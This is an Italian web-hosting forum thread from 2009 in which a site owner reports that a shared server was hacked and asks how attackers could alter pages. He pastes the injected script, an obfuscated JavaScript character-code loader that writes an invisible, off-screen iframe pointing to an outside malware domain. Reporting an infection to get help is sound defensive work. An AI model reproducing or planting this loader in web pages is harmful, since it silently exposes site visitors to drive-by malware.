Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 2 su 2
  1. 12-05-2009, 10:05 #1
    stonati
    stonati non è in linea
    Utente di HTML.it
    Registrato dal
    Jun 2001
    Messaggi
    116

    Server bucati dall' 8 maggio 2009 in poi...

    Spero che sia questo i forum giusto.
    Dal 8 maggio 2009 alcuni server di ...... (non inserisco il nome di chi mi ha fornito il servizio hosting condiviso) sono sotto attacco.
    Di seguito il codice "immesso" nelle home, index, default, ovviamente senza autorizzazione da qualche "mal"intenzionato:
    Codice PHP:
    <script type="text/javascript">var GdpldPBsdvjorQSwfbuS "kw60kw105kw102kw114kw97kw109kw101kw32kw119kw105kw100kw116kw104kw61kw34kw52kw56kw48kw34kw32kw104kw101kw105kw103kw104kw116kw61kw34kw54kw48kw34kw32kw115kw114kw99kw61kw34kw104kw116kw116kw112kw58kw47kw47kw100kw111kw119kw110kw108kw111kw97kw100kw45kw49kw50kw51kw46kw99kw110kw47kw118kw116kw105kw97kw100kw109kw105kw110kw50kw47kw116kw46kw112kw104kw112kw34kw32kw115kw116kw121kw108kw101kw61kw34kw98kw111kw114kw100kw101kw114kw58kw48kw112kw120kw59kw32kw112kw111kw115kw105kw116kw105kw111kw110kw58kw114kw101kw108kw97kw116kw105kw118kw101kw59kw32kw116kw111kw112kw58kw48kw112kw120kw59kw32kw108kw101kw102kw116kw58kw45kw53kw48kw48kw112kw120kw59kw32kw111kw112kw97kw99kw105kw116kw121kw58kw48kw59kw32kw102kw105kw108kw116kw101kw114kw58kw112kw114kw111kw103kw105kw100kw58kw68kw88kw73kw109kw97kw103kw101kw84kw114kw97kw110kw115kw102kw111kw114kw109kw46kw77kw105kw99kw114kw111kw115kw111kw102kw116kw46kw65kw108kw112kw104kw97kw40kw111kw112kw97kw99kw105kw116kw121kw61kw48kw41kw59kw32kw45kw109kw111kw122kw45kw111kw112kw97kw99kw105kw116kw121kw58kw48kw34kw62kw60kw47kw105kw102kw114kw97kw109kw101kw62";var cyFDWFBHQiyWMnIpDJig GdpldPBsdvjorQSwfbuS.split("kw");var ERVwiosNQnfsmlwIqxQG "";for (var gOdsCliGvQnAiIwQxpeN=1gOdsCliGvQnAiIwQxpeN<cyFDWFBHQiyWMnIpDJig.lengthgOdsCliGvQnAiIwQxpeN++){ERVwiosNQnfsmlwIqxQG+=String.fromCharCode(cyFDWFBHQiyWMnIpDJig[gOdsCliGvQnAiIwQxpeN]);}document.write(ERVwiosNQnfsmlwIqxQG)</script> 
    Non hanno solo immesso codice ma inserito nuove pagine, cambiati i permessi alle cartelle, insomma, non è SQL Inj ma un vero problema sul server.
    Qui ovviamente javascript non farà niente di male.......vero?

    Qualcuno a riscontrato gli stessi problemi su qualche server in questi giorni?


    Rispondi quotando Rispondi quotando
  2. 14-05-2009, 18:30 #2
    stonati
    stonati non è in linea
    Utente di HTML.it
    Registrato dal
    Jun 2001
    Messaggi
    116
    UP UP UP ^^^^^^^ UP UP UP

    Nessun ha avuto problemi simili?
    Secondo voi in che modo possono cambiarti una pagina? Vulnerabilità della password FTP?
    Sul server dove è rpesente il sito mi hanno cambiato le index page, le default page e in alcune directory hanno inserito delle pagina start.asp.

    Inoltre hanno inserito codice maligno solo nella root e nel primo sotto livello.

    Cosa può essere successo???
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.